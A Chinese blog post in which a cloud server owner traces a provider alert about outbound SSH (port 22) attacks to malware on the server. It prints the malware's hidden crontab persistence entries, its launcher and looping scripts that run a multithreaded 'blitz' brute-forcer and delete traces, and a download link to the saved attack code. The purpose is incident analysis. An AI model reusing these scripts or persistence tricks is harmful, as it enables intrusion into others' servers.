【对外攻击行为】排查解决腾讯云服务器存在对外攻击行为,已阻断该服务器对其他服务器端口(TCP:22)的访问

解决方法来自腾讯客服

https://cloud.tencent.com/document/product/296/9604,这是我们给您的建议,建议您排查下您的服务器情况

 

执行下crontab -l

[root@VM-0-14-centos c]# crontab -l
1 1 */2 * * /root/.configrc4/a/upd>/dev/null 2>&1
@reboot /root/.configrc4/a/upd>/dev/null 2>&1
5 8 * * 0 /root/.configrc4/b/sync>/dev/null 2>&1
@reboot /root/.configrc4/b/sync>/dev/null 2>&1
0 0 */3 * * /tmp/.X291-unix/.rsync/c/aptitude>/dev/null 2>&1

查看内容:

[root@VM-0-14-centos c]# cat /tmp/.X291-unix/.rsync/c/aptitude
#!/bin/sh
cd /tmp/.X291-unix/.rsync/c
./run &>/dev/null

 

cat run显示如下内容

#!/bin/bash
PR=1
PR=$(cat /proc/cpuinfo | grep model | grep name | wc -l)

ARCH=`uname -m`
if [ "$ARCH" == "x86_64" ]; then
        if [ $PR -lt 7 ]; then
                sleep 15
                ./stop
                sleep 3
                RANGE=240
                s=$RANDOM
                let "s %= $RANGE"
                sleep $s
                #nohup ./golan >>/dev/null &
                #sleep 20m && 
                nohup ./go >>/dev/null &
        fi
        if [ $PR -gt 7 ]; then
                #sleep 15
                #./stop
                sleep 3
                #nohup ./golan >>/dev/null &
        fi
else
        #nohup ./golan >>/dev/null &
        #sleep 20m && 
        nohup ./go >>/dev/null &
fi

查看go脚本:

[root@VM-0-14-centos c]# cat go
#!/bin/bash
dir=`pwd`
cd $dir

threads=515

ARCH=`uname -m`
if [[ "$ARCH" =~ ^arm ]]; then
        threads=75
fi

if [[ "$ARCH"  == "i686" ]]; then
        threads=516
fi

cont=1

                while :
                do
                start=$(date +%s)
                touch v
                rm -rf p
                rm -rf ip
                rm -rf xtr*
                rm -rf a a.*
                rm -rf b b.*
                echo "257.287.563.234" >> c
                echo "257.287.563.234" >> c
                echo "sdaferthqhr34312asdfa" >> d
                echo "sdaferthqhr34312asdfa" >> d

                sleep $[ ( $RANDOM % 30 )  + 1 ]s
                timeout 6h ./blitz -t $threads -f 1 -s 12 -S 8 -p 0 -d 1 p ip
                sleep 3
                end=$(date +%s)

                if [[ $(($end-$start))  -lt "180" ]]; then
                        let threads=threads-50
                        let cont=cont+1
                        if [[ $(($threads))  -lt "80" ]]; then
                                                ./stop
                        fi
                        if [[ $(($cont))  -gt "6" ]]; then
                                                ./stop
                        fi
                fi

                rm -rf xtr*
                rm -rf ip
                rm -rf p
                rm -rf .out
                rm -rf /tmp/t*
                done
exit 0
[root@VM-0-14-centos c]# cat blitz
#!/bin/bash
SCRIPT_PATH=$(dirname $(readlink -f $0))
ARCH=`uname -m`
if [ "$ARCH" == "i686" ]; then
        $SCRIPT_PATH/blitz32 $*
elif [ "$ARCH" == "x86_64" ];   then
        $SCRIPT_PATH/blitz64 $*
fi

 

在执行 netstat -ano|egrep “tcp|udp”

 

完整攻击的代码已被我保存,空了的时候 在研究下这些坏人是怎么做的!!

下载地址:

https://www.aliyundrive.com/s/sS87xUzEmPP

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注